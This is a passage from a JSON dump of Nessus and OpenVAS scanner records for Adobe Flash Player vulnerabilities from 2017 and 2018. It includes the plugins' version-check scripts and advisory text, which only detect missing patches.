"HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2019-03-20T00:00:00", "type": "nessus", "title": "Flash Player < 28.0.0.137 Information Disclosure (APSB18-01)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4871"], "modified": "2019-04-09T00:00:00", "cpe": ["cpe:2.3:a:adobe:flash_player:*:*:*:*:*:*:*:*"], "id": "700429.PRM", "href": "https://www.tenable.com/plugins/nnm/700429", "sourceData": "Binary data 700429.prm", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-01-11T14:37:16", "description": "An update for flash-plugin is now available for Red Hat Enterprise Linux 6 Supplementary.\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.\n\nThe flash-plugin package contains a Mozilla Firefox compatible Adobe Flash Player web browser plug-in.\n\nThis update upgrades Flash Player to version 28.0.0.137.\n\nSecurity Fix(es) :\n\n* This update fixes multiple vulnerabilities in Adobe Flash Player.\nThese vulnerabilities, detailed in the Adobe Security Bulletins listed in the References section, could allow an attacker to create a specially crafted SWF file that would cause flash-plugin to disclose sensitive information or modify its settings when the victim loaded a page containing the malicious SWF content. (CVE-2017-11305, CVE-2018-4871)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2018-01-11T00:00:00", "type": "nessus", "title": "RHEL 6 : flash-plugin (RHSA-2018:0081)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11305", "CVE-2018-4871"], "modified": "2019-10-24T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:flash-plugin", "cpe:/o:redhat:enterprise_linux:6"], "id": "REDHAT-RHSA-2018-0081.NASL", "href": "https://www.tenable.com/plugins/nessus/105743", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2018:0081. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(105743);\n script_version(\"3.8\");\n script_cvs_date(\"Date: 2019/10/24 15:35:44\");\n\n script_cve_id(\"CVE-2017-11305\", \"CVE-2018-4871\");\n script_xref(name:\"RHSA\", value:\"2018:0081\");\n\n script_name(english:\"RHEL 6 : flash-plugin (RHSA-2018:0081)\");\n script_summary(english:\"Checks the rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An update for flash-plugin is now available for Red Hat Enterprise\nLinux 6 Supplementary.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nThe flash-plugin package contains a Mozilla Firefox compatible Adobe\nFlash Player web browser plug-in.\n\nThis update upgrades Flash Player to version 28.0.0.137.\n\nSecurity Fix(es) :\n\n* This update fixes multiple vulnerabilities in Adobe Flash Player.\nThese vulnerabilities, detailed in the Adobe Security Bulletins listed\nin the References section, could allow an attacker to create a\nspecially crafted SWF file that would cause flash-plugin to disclose\nsensitive information or modify its settings when the victim loaded a\npage containing the malicious SWF content. (CVE-2017-11305,\nCVE-2018-4871)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://helpx.adobe.com/security/products/flash-player/apsb17-42.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://helpx.adobe.com/security/products/flash-player/apsb18-01.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2018:0081\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2017-11305\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2018-4871\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected flash-plugin package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:flash-plugin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/12/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/01/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/01/11\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2018:0081\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL6\", reference:\"flash-plugin-28.0.0.137-1.el6_9\")) flag++;\n\n if (flag)\n {\n flash_plugin_caveat = '\\n' +\n 'NOTE: This vulnerability check only applies to RedHat released\\n' +\n 'versions of the flash-plugin package. This check does not apply to\\n' +\n 'Adobe released versions of the flash-plugin package, which are\\n' +\n 'versioned similarly and cause collisions in detection.\\n\\n' +\n\n 'If you are certain you are running the Adobe released package of\\n' +\n 'flash-plugin and are running a version of it equal or higher to the\\n' +\n 'RedHat version listed above then you can consider this a false\\n' +\n 'positive.\\n';\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + redhat_report_package_caveat() + flash_plugin_caveat\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"flash-plugin\");\n }\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}], "openvas": [{"lastseen": "2019-10-24T21:00:10", "description": "This host is installed with Adobe Flash Player\n and is prone to multiple remote code execution vulnerabilities.", "cvss3": {}, "published": "2018-03-14T00:00:00", "type": "openvas", "title": "Adobe Flash Player Within Google Chrome Multiple RCE Vulnerabilities - Linux", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-4920", "CVE-2018-4919"], "modified": "2019-10-23T00:00:00", "id": "OPENVAS:1361412562310813029", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310813029", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe Flash Player Within Google Chrome Multiple RCE Vulnerabilities - Linux\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:flash_player_chrome\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.813029\");\n script_version(\"2019-10-23T10:55:06+0000\");\n script_cve_id(\"CVE-2018-4920\", \"CVE-2018-4919\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-10-23 10:55:06 +0000 (Wed, 23 Oct 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-03-14 11:17:28 +0530 (Wed, 14 Mar 2018)\");\n script_name(\"Adobe Flash Player Within Google Chrome Multiple RCE Vulnerabilities - Linux\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Flash Player\n and is prone to multiple remote code execution vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to a type confusion\n error and use-after-free error in the flash player.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation of these vulnerabilities\n will allow an attacker to execute arbitrary code on affected system and take\n control of the affected system.\");\n\n script_tag(name:\"affected\", value:\"Adobe Flash Player version 28.0.0.161 and\n earlier within Google Chrome on Linux.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Flash Player version\n 29.0.0.113 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb18-05.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_flash_player_within_google_chrome_detect_lin.nasl\");\n script_mandatory_keys(\"AdobeFlashPlayer/Chrome/Lin/Ver\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!infos = get_app_version_and_location( cpe:CPE, exit_no_version:TRUE )) exit(0);\nvers = infos['version'];\npath = infos['location'];\n\nif(version_is_less_equal(version:vers, test_version:\"28.0.0.161\"))\n{\n report = report_fixed_ver(installed_version:vers, fixed_version:\"29.0.0.113\", install_path:path);\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-10-24T20:57:45", "description": "This host is installed with Adobe Flash Player\n and is prone to multiple remote code execution vulnerabilities.", "cvss3": {}, "published": "2018-03-14T00:00:00", "type": "openvas", "title": "Adobe Flash Player Within Google Chrome Multiple RCE Vulnerabilities - Mac OS X", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-4920", "CVE-2018-4919"], "modified": "2019-10-23T00:00:00", "id": "OPENVAS:1361412562310813028", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310813028", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe Flash Player Within Google Chrome Multiple RCE Vulnerabilities - Mac OS X\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:flash_player_chrome\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.813028\");\n script_version(\"2019-10-23T10:55:06+0000\");\n script_cve_id(\"CVE-2018-4920\", \"CVE-2018-4919\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-10-23 10:55:06 +0000 (Wed, 23 Oct 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-03-14 11:17:28 +0530 (Wed, 14 Mar 2018)\");\n script_name(\"Adobe Flash Player Within Google Chrome Multiple RCE Vulnerabilities - Mac OS X\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Flash Player\n and is prone to multiple remote code execution vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to a type confusion\n error and use-after-free error in the flash player.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation of these vulnerabilities\n will allow an attacker to execute arbitrary code on affected system and take\n control of the affected system.\");\n\n script_tag(name:\"affected\", value:\"Adobe Flash Player version 28.0.0.161 and\n earlier within Google Chrome on Mac OS X.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Flash Player version\n 29.0.0.113 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb18-05.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_flash_player_within_google_chrome_detect_macosx.nasl\");\n script_mandatory_keys(\"AdobeFlashPlayer/Chrome/MacOSX/Ver\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!infos = get_app_version_and_location( cpe:CPE, exit_no_version:TRUE )) exit(0);\nvers = infos['version'];\npath = infos['location'];\n\nif(version_is_less_equal(version:vers, test_version:\"28.0.0.161\"))\n{\n report = report_fixed_ver(installed_version:vers, fixed_version:\"29.0.0.113\", install_path:path);\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-10-24T21:13:19", "description": "This host is installed with Adobe Flash Player\n and is prone to multiple remote code execution vulnerabilities.", "cvss3": {}, "published": "2018-03-14T00:00:00", "type": "openvas", "title": "Adobe Flash Player Multiple Remote Code Execution Vulnerabilities - Linux (apsb18-05)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-4920", "CVE-2018-4919"], "modified": "2019-10-23T00:00:00", "id": "OPENVAS:1361412562310813026", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310813026", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe Flash Player Multiple Remote Code Execution Vulnerabilities - Linux (apsb18-05)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:flash_player\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.813026\");\n script_version(\"2019-10-23T10:55:06+0000\");\n script_cve_id(\"CVE-2018-4920\", \"CVE-2018-4919\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-10-23 10:55:06 +0000 (Wed, 23 Oct 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-03-14 11:17:28 +0530 (Wed, 14 Mar 2018)\");\n script_name(\"Adobe Flash Player Multiple Remote Code Execution Vulnerabilities - Linux (apsb18-05)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Flash Player\n and is prone to multiple remote code execution vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to a type confusion\n error and use-after-free error in the flash player.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation of these\n vulnerabilities will allow an attacker to execute arbitrary code on\n affected system and take control of the affected system.\");\n\n script_tag(name:\"affected\", value:\"Adobe Flash Player version 28.0.0.161 and earlier on Linux.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Flash Player version\n 29.0.0.113 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb18-05.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_adobe_flash_player_detect_lin.nasl\");\n script_mandatory_keys(\"AdobeFlashPlayer/Linux/Ver\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!infos = get_app_version_and_location( cpe:CPE, exit_no_version:TRUE )) exit(0);\nvers = infos['version'];\npath = infos['location'];\n\nif(version_is_less_equal(version:vers, test_version:\"28.0.0.161\"))\n{\n report = report_fixed_ver(installed_version:vers, fixed_version:\"29.0.0.113\", install_path:path);\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-10-24T21:14:29", "description": "This host is installed with Adobe Flash Player\n and is prone to multiple remote code execution vulnerabilities.", "cvss3": {}, "published": "2018-03-14T00:00:00", "type": "openvas", "title": "Adobe Flash Player Multiple Remote Code Execution Vulnerabilities - Mac OS X (apsb18-05)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-4920", "CVE-2018-4919"], "modified": "2019-10-23T00:00:00", "id": "OPENVAS:1361412562310813025", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310813025", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe Flash Player Multiple Remote Code Execution Vulnerabilities - Mac OS X (apsb18-05)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:flash_player\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.813025\");\n script_version(\"2019-10-23T10:55:06+0000\");\n script_cve_id(\"CVE-2018-4920\", \"CVE-2018-4919\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-10-23 10:55:06 +0000 (Wed, 23 Oct 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-03-14 11:17:28 +0530 (Wed, 14 Mar 2018)\");\n script_name(\"Adobe Flash Player Multiple Remote Code Execution Vulnerabilities - Mac OS X (apsb18-05)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Flash Player\n and is prone to multiple remote code execution vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to a type confusion\n error and use-after-free error in the flash player.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation of these\n vulnerabilities will allow an attacker to execute arbitrary code on\n affected system and take control of the affected system.\");\n\n script_tag(name:\"affected\", value:\"Adobe Flash Player version 28.0.0.161 and\n earlier on Mac OS X.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Flash Player version\n 29.0.0.113 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb18-05.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"secpod_adobe_prdts_detect_macosx.nasl\");\n script_mandatory_keys(\"Adobe/Flash/Player/MacOSX/Version\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!infos = get_app_version_and_location( cpe:CPE, exit_no_version:TRUE )) exit(0);\nvers = infos['version'];\npath = infos['location'];\n\nif(version_is_less_equal(version:vers, test_version:\"28.0.0.161\"))\n{\n report = report_fixed_ver(installed_version:vers, fixed_version:\"29.0.0.113\", install_path:path);\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-05-18T16:52:51", "description": "This host is installed with Adobe Flash Player\n within Microsoft Edge or Internet Explorer and is prone to multiple remote code\n execution vulnerabilities.", "cvss3": {}, "published": "2018-03-14T00:00:00", "type": "openvas", "title": "Microsoft IE And Microsoft Edge Flash Player Multiple RCE Vulnerabilities (apsb18-05)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-4920", "CVE-2018-4919"], "modified": "2020-05-14T00:00:00", "id": "OPENVAS:1361412562310813030", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310813030", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft IE And Microsoft Edge Flash Player Multiple RCE Vulnerabilities (apsb18-05)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.813030\");\n script_version(\"2020-05-14T14:30:11+0000\");\n script_cve_id(\"CVE-2018-4920\", \"CVE-2018-4919\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-05-14 14:30:11 +0000 (Thu, 14 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-03-14 11:17:28 +0530 (Wed, 14 Mar 2018)\");\n script_name(\"Microsoft IE And Microsoft Edge Flash Player Multiple RCE Vulnerabilities (apsb18-05)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"gb_flash_player_within_ie_edge_detect.nasl\");\n script_mandatory_keys(\"AdobeFlash/IE_or_EDGE/Installed\");\n\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb18-05.html\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Flash Player\n within Microsoft Edge or Internet Explorer and is prone to multiple remote code\n execution vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaw exist due to a type confusion\n error and use-after-free error in the flash player.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation of these vulnerabilities\n will allow an attacker to execute arbitrary code on affected system and take\n control of the affected system.\");\n\n script_tag(name:\"affected\", value:\"Adobe Flash Player within Microsoft Edge or\n Internet Explorer on,\n\n Windows 10 Version 1511 for x32/x64 Edition,\n\n Windows 10 Version 1607 for x32/x64 Edition,\n\n Windows 10 Version 1703 for x32/x64 Edition,\n\n Windows 10 Version 1709 for x32/x64 Edition,\n\n Windows 10 x32/x64 Edition,\n\n Windows 8.1 for x32/x64 Edition and\n\n Windows Server 2012/2012 R2/2016\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more\n information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\n\nif(hotfix_check_sp(win8_1:1, win8_1x64:1, win2012:1, win2012R2:1, win10:1,\n win10x64:1, win2016:1) <= 0)\n exit(0);\n\ncpe_list = make_list(\"cpe:/a:adobe:flash_player_internet_explorer\", \"cpe:/a:adobe:flash_player_edge\");\n\nif(!infos = get_app_version_and_location_from_list(cpe_list:cpe_list, exit_no_version:TRUE))\n exit(0);\n\nvers = infos[\"version\"];\npath = infos[\"location\"];\nif(path) {\n path += \"\\Flashplayerapp.exe\";\n} else {\n path = \"Could not find the install 